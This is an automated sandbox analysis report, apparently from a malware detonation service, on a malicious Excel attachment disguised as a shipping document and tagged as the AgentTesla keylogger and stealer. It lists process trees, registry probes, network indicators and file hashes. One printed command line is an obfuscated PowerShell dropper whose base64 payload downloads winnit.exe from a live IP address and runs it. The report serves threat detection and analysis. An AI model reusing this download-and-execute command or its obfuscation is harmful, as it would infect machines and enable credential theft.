Malware Analysis Report

2024-12-07 14:09

Sample ID 241112-hemp6sxbrk
Target DRAFT BL & MBL PO NO ECM1D2403-29.xls
SHA256 0980c818b185071ebf00005388e6d09283692a33cdd5a28005b76c0018960f40
Tags
agenttesla defense_evasion discovery execution keylogger spyware stealer trojan upx
score
10/10


Analysis Overview

score
10/10

SHA256

0980c818b185071ebf00005388e6d09283692a33cdd5a28005b76c0018960f40

Threat Level: Known bad

The file DRAFT BL & MBL PO NO ECM1D2403-29.xls was found to be: Known bad.

Malicious Activity Summary

agenttesla defense_evasion discovery execution keylogger spyware stealer trojan upx

Agenttesla family

AgentTesla

Process spawned unexpected child process

Blocklisted process makes network request

Downloads MZ/PE file

Evasion via Device Credential Deployment

Executes dropped EXE

Loads dropped DLL

Drops file in System32 directory

UPX packed file

Suspicious use of SetThreadContext

AutoIT Executable

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Enumerates system info in registry

Suspicious behavior: MapViewOfSection

Suspicious use of FindShellTrayWindow

Uses Volume Shadow Copy service COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Checks processor information in registry

Suspicious use of SetWindowsHookEx

Uses Volume Shadow Copy WMI provider

Suspicious behavior: AddClipboardFormatListener

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-12 06:39

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-12 06:39

Reported

2024-11-12 06:41

Platform

win7-20240903-en

Max time kernel

142s

Max time network

144s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\DRAFT BL & MBL PO NO ECM1D2403-29.xls"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Agenttesla family

agenttesla

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1676 set thread context of 536 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2864 wrote to memory of 2680 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe
PID 2864 wrote to memory of 2680 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe
PID 2864 wrote to memory of 2680 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe
PID 2864 wrote to memory of 2680 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe
PID 2680 wrote to memory of 1604 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 1604 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 1604 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 1604 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 1648 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2680 wrote to memory of 1648 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2680 wrote to memory of 1648 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2680 wrote to memory of 1648 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1648 wrote to memory of 1664 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1648 wrote to memory of 1664 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1648 wrote to memory of 1664 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1648 wrote to memory of 1664 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2680 wrote to memory of 1676 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Users\Admin\AppData\Roaming\winnit.exe
PID 2680 wrote to memory of 1676 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Users\Admin\AppData\Roaming\winnit.exe
PID 2680 wrote to memory of 1676 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Users\Admin\AppData\Roaming\winnit.exe
PID 2680 wrote to memory of 1676 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Users\Admin\AppData\Roaming\winnit.exe
PID 1676 wrote to memory of 536 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1676 wrote to memory of 536 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1676 wrote to memory of 536 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1676 wrote to memory of 536 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1676 wrote to memory of 536 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1676 wrote to memory of 536 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1676 wrote to memory of 536 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1676 wrote to memory of 536 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\DRAFT BL & MBL PO NO ECM1D2403-29.xls"

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe

"C:\Windows\SysTEm32\windowspOWeRsheLl\v1.0\powERsHeLl.eXe" "pOWeRSHelL -Ex bypasS -NOp -w 1 -C DEViCEcReDeNtiALdEpLOYMeNT ; iex($(iEX('[SystEm.TEXT.eNCodIng]'+[ChAR]58+[CHAR]0x3A+'uTf8.GetStRinG([SysteM.cOnveRt]'+[CHaR]58+[CHAr]58+'FroMbASe64STRinG('+[Char]34+'JFA4OFdJYWNrc1AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYmVSREVGaU5JVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOVFhndHZ0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElCcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5Tix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU0hhaExkWVRmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG94Y1NTY0FSKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaHBBY3JBVXAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVzUEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHlZalRCc0pMcmx6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQODhXSWFja3NQOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MC93aW5uaXQuZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U1RBcnQtc0xlRVAoMyk7U3RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHdpbm5pdC5leGUi'+[cHaR]0x22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bypasS -NOp -w 1 -C DEViCEcReDeNtiALdEpLOYMeNT

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ocv1odh_.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES95BB.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC95BA.tmp"

C:\Users\Admin\AppData\Roaming\winnit.exe

"C:\Users\Admin\AppData\Roaming\winnit.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Users\Admin\AppData\Roaming\winnit.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.23.210.82:80 r10.o.lencr.org tcp
US 192.3.176.141:80 192.3.176.141 tcp
KR 221.146.204.133:443 4t.gg tcp
US 192.3.176.141:80 192.3.176.141 tcp
US 192.3.176.141:80 192.3.176.141 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.18:80 crl.microsoft.com tcp

Files

memory/1548-1-0x0000000072ACD000-0x0000000072AD8000-memory.dmp

memory/1548-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2864-18-0x00000000026B0000-0x00000000026B2000-memory.dmp

memory/1548-19-0x0000000002E80000-0x0000000002E82000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 55469833d7799c93bcff0151aac1fac3
SHA1 748b81efe28ebb013531752809c11645072b0ec6
SHA256 e12cc9a5371af2690e667664fcb4485a17086afc05be76f7547ea3c757a05e7c
SHA512 18810a85d67d14fa5daa81c6adfd74e3322942053778fc99e48dfbc525aca9778792ac72e122a3dc23f7d09a4040e3bc67ab6c6f29a544dc3624f49a544398ec

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CB467543952BE6B5200B9CADEB942CD1

MD5 81132b36583c8271c57dea829ba9e703
SHA1 733155c25e7d1d2de1fd3ccc344687f8e3acf405
SHA256 c53f813e6a53f3e5579a06f2ada1c6829797a20e83b7702d6988de6dd3c19a0e
SHA512 03eaecf39525bbc457de040b82767addf8492ce69642a7a3861d167db441105db5905bfddfa8d61adfd4e00518ed70e929cd1f9fd4ff2c07242694c307c992a4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CB467543952BE6B5200B9CADEB942CD1

MD5 2e3125315d4e0e452bfae34b0173468a
SHA1 8c7e8b5840c18f62f4e78fb4da127618107f5830
SHA256 0126b5d3d27e325b5fd941de68acf7ebf4efe9cea47d0a9da4bedc69b7fd2950
SHA512 aa70dd1413cc21341ca4b9674839646cc172ffbf981c6cbad80c7f814c45a1a160844838e559c780525ff78645979c2dbd6b3e84b04289df3961e1c6e7f09ec9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 91a948bad6e782c079892521f81d3d4e
SHA1 fdb2aec7efdb01c76bd27e2dfd30752160ef9b1f
SHA256 e0157f605e6faf185ae1e0480ee0cb3f63427e5fe54a6341cf73cf4cbaaba6f7
SHA512 ffc6c71221c8755d0a2b05c4d4614dc75634c8d4f703da0e54c2d41e28a6b45bb1cd49d71c87d6d625d029cb78a5c5fba062e0099ab14304af5d7496ab0fd9fe

C:\Users\Admin\AppData\Local\Temp\Cab8D90.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M4TQDAHL\creatingnextleeverthingswithentireprocessgetitinonlineback[1].hta

MD5 e69934eff6238d7a043cf35938fd4ad3
SHA1 de69f4785657104ad260b25c6e09231f566991f1
SHA256 46af3b6280d8707438e4c2f4c8134ddafe46a4c59799b84e55645b384b4aa208
SHA512 c821bd8f363f22f941093588a9f7772a479d930daf190124be13a7f493fe73debb1c535990d9cb5c3982234e3572202a42c95087ea90e0681cc32509e79e722b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 4a8a7ccc92be041135050ee09493f9df
SHA1 236e7038ab3c8167098ce50cc035c4d091d05e4f
SHA256 4980b1c542fdef791a7ac8d436bd84663439196dcae593c8e442dc530741ce79
SHA512 afd93c766212ce030db78e8a2ebcbca16112038cb0e0522a469c24823340c6cd0456d2820af1a1bae8c2abb1a0e4b2fd1b9dfeb0a5bf2195ef298a7816ce29e4

\??\c:\Users\Admin\AppData\Local\Temp\ocv1odh_.cmdline

MD5 ca591f07374597d96c1a8120de1c786e
SHA1 9b5c4faf1f4bed1642c8f9d9d81e17b7750d0a55
SHA256 8e0c9b2edc00baa5f34fcac98245dda553e1ff280f3512383eb96e5d74dc811a
SHA512 73daa3d52e8822742e3a8d4807016c93944ae46097edf5aceea02174719d77ce029bf05dbbd29fd6dcf20411540a948cce922aad5af5c05487b9a43aff58fa67

\??\c:\Users\Admin\AppData\Local\Temp\ocv1odh_.0.cs

MD5 465b4325ef1dc4adfed6e9822e476e55
SHA1 2fa23c543ae1210d7b44ed6410522ccb5671e001
SHA256 ba069a73c9bf86bc2bc6bfc8532e250817a987761f5ff33d9816c3581efa196c
SHA512 6acd9cdd680e29d3f81813a4011cd0252f0132834393a3c2b40e9ece2c9173accc46eccd29eb9712af8042a0e97472be8a2a265301742612aab28cb8a0f2c1e8

\??\c:\Users\Admin\AppData\Local\Temp\CSC95BA.tmp

MD5 22a7dd2defd95574761960499b9dfa56
SHA1 af5f537b9f14f7c254fc97fab667b61d5407ad5b
SHA256 6cd621f34a88f5ee145d77d0f078c4ada230cfb67270de2000de304d92bdc2cd
SHA512 91da2cbbe9ca0724bd51f3bbe0eb15844301ea6bda4c32056151567672bbe63697e9947b17ecbd288277e51d5824b04c7d6ac2627f2292660f92e10dc2e172d0

C:\Users\Admin\AppData\Local\Temp\RES95BB.tmp

MD5 c905ea629ecb6d8428b94c0ecf3cbe73
SHA1 1fb8355e223142e69fd07a7e4c33dbc81995be47
SHA256 5e6a1c07878207c857324929f919b6a9d45036a2eafa6559648064bf7edc7a18
SHA512 456e56878b0520463583486f6ebb0d749cecaa384c2038be5cd54ac55716e1b4b76955997bd07bc033f7d1095b8614b7f94fe319b87ba110d8b5f4d961207505

C:\Users\Admin\AppData\Local\Temp\ocv1odh_.dll

MD5 64dceeceafc4fd549f6ff6e48a475d1c
SHA1 0145f1d1158d3c6b8c7642653d302b6c42e2c9d5
SHA256 ff7cab3e65a9757318150d0beab335bed481d958002db001f9d58128eeae3479
SHA512 d87c26129b32428fa10885caf847ea03a4abb337287b240a753e274c9dca21e6e9f0f1cbbf7928ebaa249c481e6b56fe584b7e8872400bb1a0abe4b8086474a5

C:\Users\Admin\AppData\Local\Temp\ocv1odh_.pdb

MD5 aa37b06540a90275bee9efd0e415574d
SHA1 879352fe88db2ca9694897424f6d7123032e0d10
SHA256 7ec0a42cce47a1941b20759045d769637ae9b43459300b0cf534b2952b23d65f
SHA512 0c3f301e68c068670fc339f4911fa33b0c1f909d587acc25b6ba59a8046c7df98602392ad327621d908e68f92d9127b69b6c047d8823ae725777ff374dc9cb1c

C:\Users\Admin\AppData\Roaming\winnit.exe

MD5 ed7480dfd2d2fd5742d7b4eff9c1d26d
SHA1 5a69a5ec59e9bfcd221ca0925d774516debfdf4b
SHA256 166fec0187fb56dd61b937fa2c903a762102e1c139b47682eafa4cce0e991e7d
SHA512 f19a8832f998225d0f1043422f6800377fcf7dda282ba88c8d333d3734a884eccadf28babd70ae7f9f249c29355b237dd690c03d74e207fbe6e12c866255270b


Analysis: behavioral2

Detonation Overview

Submitted

2024-11-12 06:39

Reported

2024-11-12 06:41

Platform

win10v2004-20241007-en

Max time kernel

145s

Max time network

137s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\DRAFT BL & MBL PO NO ECM1D2403-29.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 112 wrote to memory of 2488 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 112 wrote to memory of 2488 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\DRAFT BL & MBL PO NO ECM1D2403-29.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
IE 52.109.76.243:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 243.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.23.210.75:80 r10.o.lencr.org tcp
US 8.8.8.8:53 133.204.146.221.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 75.210.23.2.in-addr.arpa udp
US 192.3.176.141:80 192.3.176.141 tcp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 141.176.3.192.in-addr.arpa udp
US 8.8.8.8:53 131.72.42.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp

Files


C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 b0a211906cc3ea22cb03b173083a1658
SHA1 8b52d098dc6d460ef48a1a6249fe564f87070cda
SHA256 36278ac46e1884e67089c4189424fa93a8d673ebab644bfab4003a9937a79043
SHA512 c8d2532ce5144241efa8f6a0ee57a89f7ffc48442f2c47a036d1b9407f73b2720036f9d2ca782f1c9b03bdac5791b632e45d2a8dcaeb051ee4f7bf0f65fd6414